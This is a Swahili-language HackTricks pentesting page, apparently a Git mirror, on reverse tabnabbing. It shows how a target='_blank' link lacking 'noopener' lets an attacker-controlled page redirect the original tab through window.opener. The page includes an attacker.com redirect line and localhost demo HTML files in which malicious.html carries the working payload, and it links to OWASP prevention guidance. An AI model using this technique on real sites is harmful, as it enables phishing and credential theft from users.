Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/reverse-tab-nabbing.md
Translator workflow 54a7bb5de7 Translated to Swahili
2024-02-11 02:13:58 +00:00

113 lines
6.4 KiB
Markdown
Raw Blame History

<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
# Maelezo
Katika hali ambapo **mshambuliaji** anaweza **kudhibiti** hoja ya **`href`** ya lebo ya **`<a`** na sifa ya **`target="_blank" rel="opener"`** ambayo itabonyezwa na mwathirika, **mshambuliaji** anaweza **kuielekeza** **kiunga** hiki kwenye wavuti chini ya udhibiti wake (wavuti **mbaya**). Kisha, mara tu **mwathirika anapobonyeza** kiunga na kufikia wavuti ya mshambuliaji, wavuti hii **mbaya** itaweza **kudhibiti** **ukurasa** **asili** kupitia kitu cha javascript **`window.opener`**.\
Ikiwa ukurasa hauna **`rel="opener"` lakini una `target="_blank"` na hauna `rel="noopener"`** pia inaweza kuwa na udhaifu.
Njia ya kawaida ya kutumia tabia hii ni **kubadilisha eneo la wavuti asili** kupitia `window.opener.location = https://attacker.com/victim.html` kwenda kwenye wavuti inayodhibitiwa na mshambuliaji ambayo **inafanana na ile asili**, ili iweze **kuiga** **fomu ya kuingia** ya wavuti asili na kuomba sifa za mtumiaji.
Hata hivyo, kumbuka kwamba sasa **mshambuliaji anaweza kudhibiti kitu cha dirisha cha wavuti asili** anaweza kukitumia kwa njia nyingine kufanya **mashambulizi ya siri** (labda kwa kubadilisha matukio ya javascript ili kutoa habari kwa seva inayodhibitiwa na yeye?)
# Muhtasari
## Na kiunga cha nyuma
Kiunga kati ya kurasa ya mzazi na mtoto wakati sifa ya kuzuia haijatumika:
![https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITH_LINK.png](https://owasp.org/www-community/assets/images/TABNABBING\_OVERVIEW\_WITH\_LINK.png)
## Bila kiunga cha nyuma
Kiunga kati ya kurasa ya mzazi na mtoto wakati sifa ya kuzuia inatumika:
![https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITHOUT_LINK.png](https://owasp.org/www-community/assets/images/TABNABBING\_OVERVIEW\_WITHOUT\_LINK.png)
## Mifano <a href="#examples" id="examples"></a>
Unda kurasa zifuatazo kwenye saraka na endesha seva ya wavuti na `python3 -m http.server`\
Kisha, **fikia** `http://127.0.0.1:8000/`vulnerable.html, **bonyeza** kiunga na uone jinsi **URL** ya **wavuti asili** **inavyobadilika**.
{% code title="vulnerable.html" %}
```markup
<!DOCTYPE html>
<html>
<body>
<h1>Victim Site</h1>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
</body>
</html>
```
{% code title="malicious.html" %}
```markup
<!DOCTYPE html>
<html>
<body>
<script>
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
</script>
</body>
</html>
```
{% code title="malicious_redir.html" %}
```markup
<!DOCTYPE html>
<html>
<body>
<h1>New Malicious Site</h1>
</body>
</html>
```
{% endcode %}
## Maliwazo yanayoweza kufikiwa <a href="#accessible-properties" id="accessible-properties"></a>
Katika hali ambapo ufikiaji wa **msalaba-eneo** unatokea (ufikiaji kati ya uwanja tofauti), maliwazo ya darasa la JavaScript la **window**, yanayotajwa na kumbukumbu ya kitu cha JavaScript cha **opener**, ambayo yanaweza kufikiwa na tovuti yenye nia mbaya ni mdogo kwa yafuatayo:
- **`opener.closed`**: Mali hii inatumika kuamua ikiwa dirisha limefungwa, ikirudisha thamani ya boolean.
- **`opener.frames`**: Mali hii inatoa ufikiaji kwa vipengele vyote vya iframe ndani ya dirisha la sasa.
- **`opener.length`**: Idadi ya vipengele vya iframe vilivyopo katika dirisha la sasa inarudishwa na mali hii.
- **`opener.opener`**: Kumbukumbu kwa dirisha ambalo lilifungua dirisha la sasa inaweza kupatikana kupitia mali hii.
- **`opener.parent`**: Mali hii inarudisha dirisha mama ya dirisha la sasa.
- **`opener.self`**: Ufikiaji kwa dirisha la sasa yenyewe unatolewa na mali hii.
- **`opener.top`**: Mali hii inarudisha dirisha la kivinjari cha juu kabisa.
Hata hivyo, katika hali ambapo uwanja ni sawa, tovuti yenye nia mbaya inapata ufikiaji wa mali zote zinazofichuliwa na kumbukumbu ya kitu cha JavaScript cha [**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window).
# Kuzuia
Maelezo ya kuzuia yameandikwa katika [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5\_Security\_Cheat\_Sheet.html#tabnabbing).
## Marejeo
* [https://owasp.org/www-community/attacks/Reverse_Tabnabbing](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha** [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Reference in a new issue View git blame Copy permalink